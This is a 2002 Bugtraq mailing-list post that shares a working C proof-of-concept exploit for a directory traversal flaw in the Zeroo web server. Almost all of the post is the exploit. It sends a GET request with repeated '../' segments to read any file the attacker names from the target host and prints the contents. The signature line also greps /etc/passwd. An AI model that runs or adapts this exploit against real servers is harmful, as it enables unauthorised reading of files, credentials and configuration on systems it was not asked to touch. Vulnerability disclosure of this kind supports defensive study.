Zeroo Webserver remote directory traversal exploit
Date: Tue, 3 Dec 2002 07:01:09 -0800 (PST)
From: Mike Cramp <mikecc@uc.zemos.net>
To: bugtraq@securityfocus.com
Subject: Zeroo Webserver remote directory traversal exploit
Hey guys,
A while back there was that directory traversal exploit for the Zeroo
webserver. (http://lonerunner.cfxweb.net)
Here is a proof of concept code, enjoy.
/*
* zeroo httpd remote directory traversal exploit
* proof of concept
* hehe, just a copy and paste from my other directory
* traversal exploit ;p
* [mikecc] [http://uc.zemos.net/]
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <unistd.h>
#define FOO "../"
void get(int sd);
int main(int argc, char **argv)
{
struct sockaddr_in sock;
struct hostent *pHe;
int sd;
int amt;
char * host;
char * file;
short port;
char expstr[1024];
int x;
char * baz;
printf("UC-zeroo\n");
printf("zeroo httpd remote exploit\n");
printf("[mikecc/unixclan] [http://uc.zemos.net/]\n\n");
if (argc != 5)
{
printf("%s host port file traverse_amount (>= 1 [keep incrementing till hit])\n",argv[0]);
return 0;
}
host = argv[1];
port = atoi(argv[2]);
file = argv[3];
amt = atoi(argv[4]);
if ((pHe = gethostbyname(host)) == NULL)
{
printf("Host lookup error.\n");
return 0;
}
if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
{
printf("sock() failed.\n");
return 0;
}
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
printf("Connecting...\n");
if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
{
printf("Failed to connect to %s.\n",host);
return 0;
}
printf("Setting up exploit string..\n");
if ((amt + 8 + strlen(file)) > 1024)
{
printf("Error. Limit 1024 characters.\n");
return 0;
}
sprintf(expstr,"GET /");
for (x = 0; x < amt; x++)
{
strcat(expstr,FOO);
}
printf("\tInserting file string..\n");
strcat(expstr,file);
strcat(expstr,"\n\n");
printf("Sending exploit string...\n");
write(sd,expstr,strlen(expstr));
get(sd);
close(sd);
return 0;
}
void get(int sd)
{
char buf[1024];
int x;
fd_set rset;
FD_ZERO(&rset);
while (1)
{
FD_SET(sd,&rset);
select(sd+1,&rset,0,0,0);
if (FD_ISSET(sd,&rset))
{
if ((x = read(sd,buf,1024)) == 0)
{
printf("Connection closed by foreign host.\n");
exit(1);
}
buf[x] = 0; /* clean out junk */
printf("%s\n",buf);
}
}
}
-----------------------------------------------------------
mikecc (mikecc@uc.zemos.net)
grep mikecc /etc/passwd|cut -d":" -f5|sed s/,,,//